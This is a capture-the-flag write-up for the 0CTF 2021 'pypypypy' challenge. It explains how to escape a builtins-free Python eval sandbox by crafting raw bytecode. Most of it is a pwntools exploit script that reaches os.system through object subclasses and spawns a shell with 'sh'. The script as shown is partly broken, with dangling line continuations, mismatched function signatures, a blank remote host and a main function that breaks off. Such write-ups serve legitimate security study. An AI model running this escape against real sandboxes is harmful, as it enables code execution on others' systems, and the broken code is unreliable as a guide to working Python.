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5 July 2021

0CTF 2021 / pypypypy

by umutoztunc

This was a really well-designed challenge which we enjoyed a lot. The goal was to run arbitrary bytecode inside eval without having __builtins__. Since the code object is created by the remote script, we don’t have co_consts and co_names. However, the author gifts us two magic names.

Let’s take a look at the remote script:

# 3.8.11 (default, Jun 29 2021, 19:54:56)
# [GCC 8.3.0]
import sys
from pathlib import Path
from types import CodeType

src = Path(__file__).read_text()


codestring = bytes.fromhex(input('Give me your bytecode in hex:'))
assert len(codestring) <= 2000, 'Too long!'

print('I will give you two gifts in exhange, what do you want?')

gift1 = input('gift1: ')
gift2 = input('gift2: ')
assert len(gift1) <= 10, 'Too long!'
assert len(gift2) <= 10, 'Too long!'

code = CodeType(0, 0, 0, 0, 0, 0, codestring, (), (f'__{gift1}__', f'__{gift2}__'), (), '', '', 0, b'')

result = eval(code, {'__builtins__': None}, {})
print('success, bye!')

At first our plan was calling os.system('sh') like this:

typ = None.__getattribute__('__class__')
obj = typ.__getattribute__(typ, '__base__')
sub = obj.__getattribute__(obj, '__subclasses__')()
wrap = sub[133]
ini = wrap.__getattribute__(wrap, '__init__')
glb = ini.__getattribute__('__globals__')

And we were thinking about setting gifts to __getattribute__ and __len__. The point of __len__ is to generate numbers since we don’t have co_consts. However, we realized that getattribute is too long and won’t get accepted.

After spending some time, we decided to use __class__ and __dict__ as gifts. The point is we can call __getattribute__ by combining them like this:

getattribute: a.__class__.__dict__["__getattribute__"]

Even though we realized that we don’t need None, it can be obtained like

None: {}.__class__.__dict__["get"]({}, "")


None: [].__class__.__dict__["clear"]([])

After deciding which gifts to use, we realized that we need to find a way to generate arbitrary numbers and strings. Since we didn’t have __len__ anymore, we needed another trick to generate numbers. Then, we came up with this trick:

False: '' != ''
True: '' == ''

0: False + False
1: False + True

Here is @liangjs’s amazing function to calculate all numbers in an efficient way:

def gen_int(x: int):
    if x == 0:
        return gen_zero()
    if x < 0:
        return gen_int(-x) + bytes([opmap["UNARY_NEGATIVE"], 0])
    b = bin(x)[2:]
    b = b[::-1]
    n = len(b)
    ans = gen_one()
    for i in range(n-1):
        if b[i] == '1':
            ans += dup_top()
        ans += dup_top()
        ans += bytes([opmap["BINARY_ADD"], 0])
    for i in range(n-1):
        if b[i] == '1':
            ans += bytes([opmap["BINARY_ADD"], 0])
    return ans

Now we have access to numbers, we just need arbitrary strings. We were stuck at this point for a while since we don’t have access to __str__ until @Anciety found that we can use FORMAT_VALUE opcode to format objects to str. Using this advice I came up with the following:

>>> sorted(set(f"{''.__class__.__dict__}"))
[' ', '"', "'", '(', ')', ',', '-', '.', '0', '2', '3', '4', '5', '6', '7', '8', ':', '<', '=', '>', 'C', 'I', 'O', '[', '\\', ']', '_', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '{', '}']

As you can see, we have lots of chars available in f"{''.__class__.dict__}" and we can create a function to generate chars by getting this string and using index accesses to retrieve chars on top of the stack. Finally we can use BUILD_STRING(n) to generate a string. This trick works but getting chars one by one is inefficient and it makes our payload to grow >= 2000 bytes.

Again @liangjs being a life-saver, decided to use slices instead of indexes. We just needed some strings that contain the strings we want as a substring. For example, f"{''.__class__.__class__.__dict__}" contains __init__, __getattribute__, __base__, etc.

Now, we are ready to revise our initial strategy:

typ = ''.__class__.__class__
obj = typ.__dict__['__getattribute__'](typ, '__base__')
sub = obj.__dict__['__getattribute__'](obj, '__subclasses__')()
wrap = sub[133]
ini = wrap.__class__.__dict__['__getattribute__'](wrap, '__init__')

However, after getting to os._wrap_close.__init__, we can’t use

glb = ini.__class__.__dict__['__getattribute__'](ini, '__globals__')

to get __globals__ for some reason. But, we found that operator.attrgetter was available in subclasses. Using that it is possible to get globals. So, our strategy continued like this:

attrgetter = sub[148]
glb = attrgetter('__globals__')(ini)

Another problem was passing the object itself as a parameter to these function calls. However, we realized that both __class__ and __dict__ weren’t used as names in the global scope which means that we could use them as variable names to store/load objects and values without having any other issue.

At this point we had our exploit working locally. However, it failed on the remote server since the index values in subclasses weren’t the same. We decided to cause KeyError exception using an empty map object. Since the key was printed back in the error message we decided to use format string as key to dump the contents of object.__subclasses__() like this:


After correcting the index values for os._wrap_close and operator.attrgetter, we finally got the flag.

Here is our complete solution script:

from pwn import *
from opcode import opmap, cmp_op
import os

def gen_None():
    return \
        bytes([opmap["BUILD_LIST"], 0]) + \
        get_class() + \
        get_dict() + \
        gen_string("clear") + \
        bytes([opmap["BINARY_SUBSCR"], 0]) + \
        bytes([opmap["BUILD_LIST"], 0]) + \

def gen_return():
    return bytes([opmap["RETURN_VALUE"], 0])

def get_class():
    return bytes([opmap["LOAD_ATTR"], 0])

def get_dict():
    return bytes([opmap["LOAD_ATTR"], 1])

def gen_true():
    return \
        gen_empty_str() + \
        gen_empty_str() + \
        bytes([opmap["COMPARE_OP"], cmp_op.index("==")])

def gen_false():
    return \
        gen_empty_str() + \
        gen_empty_str() + \
        bytes([opmap["COMPARE_OP"], cmp_op.index("!=")])

def gen_zero():
    return \
        gen_false() + \
        gen_false() + \
        bytes([opmap["BINARY_ADD"], 0])

def gen_one():
    return \
        gen_true() + \
        gen_false() + \
        bytes([opmap["BINARY_ADD"], 0])

def dup_top():
    return bytes([opmap["DUP_TOP"], 0])

def gen_int(x: int):
    if x == 0:
        return gen_zero()
    if x < 0:
        return gen_int(-x) + bytes([opmap["UNARY_NEGATIVE"], 0])
    b = bin(x)[2:]
    b = b[::-1]
    n = len(b)
    ans = gen_one()
    for i in range(n-1):
        if b[i] == '1':
            ans += dup_top()
        ans += dup_top()
        ans += bytes([opmap["BINARY_ADD"], 0])
    for i in range(n-1):
        if b[i] == '1':
            ans += bytes([opmap["BINARY_ADD"], 0])
    return ans

def gen_empty_str():
    return bytes([opmap["BUILD_STRING"], 0])

def gen_char(c):
    s = f"{''.__class__.__dict__}"
    if c not in s:
        raise ValueError()
    idx = s.index(c)
    return \
        gen_empty_str() + \
        get_class() + \
        get_dict() + \
        bytes([opmap["FORMAT_VALUE"], 1]) + \
        gen_int(idx) + \
        bytes([opmap["BINARY_SUBSCR"], 0])

def gen_string(helper, s: str):
    hint, code = helper()
    shint = f'{hint}'
    idx = shint.find(s)
    return code + \
        bytes([opmap["FORMAT_VALUE"], 1]) + \
        gen_int(idx) + \
        gen_int(idx + len(s)) + \
        bytes([opmap["BUILD_SLICE"], 2]) + \
        bytes([opmap["BINARY_SUBSCR"], 0])

def str_helper1():
    # __base__, __subclassess__, __init__, __getattribute__
    hint = ''.__class__.__class__.__dict__
    code = \
        gen_empty_str() + \
        get_class() + \
        get_class() + \
    return hint, code

def str_helper2():
    # __globals__
    hint = os._wrap_close.__init__.__class__.__dict__
    code = \
        b"" + \
        get_class() + \
    return hint, code

def str_helper3():
    # system
    hint = os._wrap_close.__init__.__globals__
    code = b""
    return hint, code

def str_helper4():
    # sh
    hint = ''.__class__.__dict__
    code = \
        gen_empty_str() + \
        get_class() + \
    return hint, code

def call_method(x):
    return bytes([opmap["CALL_METHOD"], x])

def call_function(x):
    return bytes([opmap["CALL_FUNCTION"], x])

def save_var(x):
    return bytes([opmap["STORE_NAME"], x])

def load_var(x):
    return bytes([opmap["LOAD_NAME"], x])

def binary_subscr():
    return bytes([opmap["BINARY_SUBSCR"], 0])

def get_code():
    code = b""

    # <class 'type'>
    code += gen_empty_str()
    code += get_class()
    code += get_class()

    # <class 'object'>
    code += save_var(1)
    code += load_var(1)
    code += get_dict()
    code += gen_string(str_helper1, '__getattribute__')
    code += binary_subscr()
    code += load_var(1)
    code += gen_string(str_helper1, '__base__')
    code += call_function(2)

    # object.__subclassess__()
    code += save_var(1)
    code += load_var(1)
    code += get_dict()
    code += gen_string(str_helper1, '__getattribute__')
    code += binary_subscr()
    code += load_var(1)
    code += gen_string(str_helper1, '__subclasses__')
    code += call_function(2)
    code += call_function(0)

    # save subclasses
    code += save_var(0)

    # exception
    code += bytes([opmap["BUILD_MAP"], 0])
    code += load_var(0)
    code += bytes([opmap["FORMAT_VALUE"], 1])
    code += binary_subscr()

    # <class 'os._wrap_close'>
    code += load_var(0)
    code += gen_int(133) # 133
    code += binary_subscr()

    # _wrap_close.__init__
    code += save_var(1)
    code += load_var(1)
    code += get_class()
    code += get_dict()
    code += gen_string(str_helper1, '__getattribute__')
    code += binary_subscr()
    code += load_var(1)
    code += gen_string(str_helper1, '__init__')
    code += call_function(2)

    # __globals__
    code += save_var(1) # save init
    code += load_var(0) # load attrgetter
    code += gen_int(148) # 168
    code += binary_subscr() # attrgetter
    code += load_var(1) # load init
    code += gen_string(str_helper2, '__globals__')
    code += call_function(1)
    code += load_var(1) # load init
    code += call_function(1)

    # globals["system"]("sh")
    code += save_var(1)
    code += load_var(1)
    code += load_var(1)
    code += gen_string(str_helper3, "system")
    code += binary_subscr()
    code += gen_string(str_helper4, "sh")
    code += call_function(1)

    code += gen_return()

    assert len(code) <= 2000
    hex_code = ''.join('%02x' % x for x in code)
    return hex_code

def main():
    gift1 = 'class'
    gift2 = 'dict'
    code = get_code()

    r = remote("", 13337)
    r.recvuntil("in hex", timeout=1)
    r.recvuntil("in hex", timeout=1)
    r.recvuntil("gift1", timeout=1)
    r.recvuntil("gift2", timeout=1)

if __name__ == '__main__':